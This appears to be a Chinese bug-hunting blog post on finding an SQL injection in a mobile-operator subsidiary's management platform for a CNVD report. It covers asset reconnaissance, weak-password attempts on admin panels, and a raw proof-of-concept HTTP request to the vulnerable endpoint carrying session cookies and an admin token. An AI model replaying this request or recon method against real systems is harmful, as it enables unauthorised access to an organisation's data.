本文仅用于技术讨论与学习,利用此文所提供的信息或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
移动某事件SQL注入

前言:cnvd事件漏洞证书条件 三大运营商和xx部

多给我点思路

通过爱企查来找全资子公司下的资产,优先看百分百控股公司旗下

image-20231107144456276

image-20231107144500222

前期通过hunter用icp.name来查找备案资产,我是挨个翻的icp.name+web.title,web.body来找薄弱点

幸运的找到了这个平台,像这种后台找找js,弱口令那几个输一下不成就退下一个

image-20231107145238379

这里搜索试了不存在SQL注入,继续往下找

image-20231107145307677

image-20231107145401460

到了这又是另一个界面了,存在的功能点非常多加载的数据包也很多,这里就需要注意burp中的历史包了

image-20231107151119187

image-20231107151138356

在history中发现了些带参数的试了试注入,大概是这个包判断注入存在与否

‘就报错了 ‘’正常

Poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
GET
/api/gatherReal/gatherRealList?areaId=&deviceKey=111&deviceType=electricityDevice&pageNum=1&pageSize=15&relation=tusrMeter&meterName=
HTTP/1.1

Host: 

X-Requested-With: XMLHttpRequest

projectid: 3

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36

token:
eyJraWQiOiIxNjc5NDcwNzE2OTMyIiwiYWxnIjoiUlMyNTYifQ.eyJpc3MiOiJFYXN0U29mdCIsImF1ZCI6ImFwaWNsaWVudCIsImV4cCI6MTY4MDAyOTAwNiwianRpIjoiMVpsMDhSN0ZVeTlsOEhuWEdILWdrQSIsImlhdCI6MTY3OTk4NTgwNiwibmJmIjoxNjc5OTg1NzQ2LCJzdWIiOiJhZG1pbiJ9.WDwgIj3MImJUa9k74c1AWESig-nd9YKgWJ1wpSAzPu8E9Rjqf955vPayU2SDFXyxQ1ZbNxl0kE5xXxH4tLII-gmW91GG-c0fhZTN9gSNm-A_b1q4YF0dI_nQ5FggLh3FA7ScwLmqswZZvE-QiWzdVc5v4tJk7wdL4G1piPSh3JZSGePXqlntj_Gi8ieQJ3eHC0ldH44liEFdXyylHyuoN1D9HLaNZ0-oknS0f_f8GmhSZcliATdCn6fFZoTost-DcuJeVtUHMRYeHBOR6BfOziTStlODpfRHw2s8EAuboFQ947jGVA9wD2Taj5L4wrkqHs-ppK8b_4yUcvI8EWTlcw

need: true

Accept: \*/\*

Referer:

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: SSLVPN_lang=1; JSESSIONID=CE3F0BD4E98448D4F1AD9DAFF9DA67BF;
auth=pass; auth.sig=v24qOahT2-6MCaXtPRgcq8U6uE0;
koa.sid=NWfL0bvR_v-k2_ilrWheD2bjjkk-7Fp2;
koa.sid.sig=deK65VI6T2MvnFMM6xylFjZGlhE;
SECKEY_ABVK=HMdrs/iY0WWgSsNX7n9rHX6jkKAT3wNhePHxh+Vvgs0%3D;
BMAP_SECKEY=gT0nwSJSicq2NofEyWeK39ytozFI_B_bluXoWC_P3db44tw7lC5e5xf7bluw9z760LgU8SyktVJma6pjpO0kQrnYjmsiED2mPy64rR95EIlC12RTQVDkC8ABA6d1QboPPyw2xasfMeQakMAnf1jvu5C_2inbLTlxD2y5BLQYAEH3mfENoVR-pkg75q07Pnvw;
permission=eyJraWQiOiIxNjc5NDcwNzE2OTMyIiwiYWxnIjoiUlMyNTYifQ.eyJpc3MiOiJFYXN0U29mdCIsImF1ZCI6ImFwaWNsaWVudCIsImV4cCI6MTY4MDAyOTAwNiwianRpIjoiMVpsMDhSN0ZVeTlsOEhuWEdILWdrQSIsImlhdCI6MTY3OTk4NTgwNiwibmJmIjoxNjc5OTg1NzQ2LCJzdWIiOiJhZG1pbiJ9.WDwgIj3MImJUa9k74c1AWESig-nd9YKgWJ1wpSAzPu8E9Rjqf955vPayU2SDFXyxQ1ZbNxl0kE5xXxH4tLII-gmW91GG-c0fhZTN9gSNm-A_b1q4YF0dI_nQ5FggLh3FA7ScwLmqswZZvE-QiWzdVc5v4tJk7wdL4G1piPSh3JZSGePXqlntj_Gi8ieQJ3eHC0ldH44liEFdXyylHyuoN1D9HLaNZ0-oknS0f_f8GmhSZcliATdCn6fFZoTost-DcuJeVtUHMRYeHBOR6BfOziTStlODpfRHw2s8EAuboFQ947jGVA9wD2Taj5L4wrkqHs-ppK8b_4yUcvI8EWTlcw;
permission.sig=ijnuqDFf-k-OoJhYN01W3HKsiVg; skin=%22skin-blue%22

Connection: close

image-20231107151401045

image-20231107151427385

icp.name=""&&web.body="管理平台”

image-20231107150306818

之后交了cnvd发现这个撞洞了,而且还是近期的,不甘心啊 那就挖通用

image-20231107150349473

一开始没找到关键字段没看出是什么公司开发的,问了下k神通过网站首页的logo找到了,超越5000w资金,只需要中高危就成了,于是引出了后来的三个通杀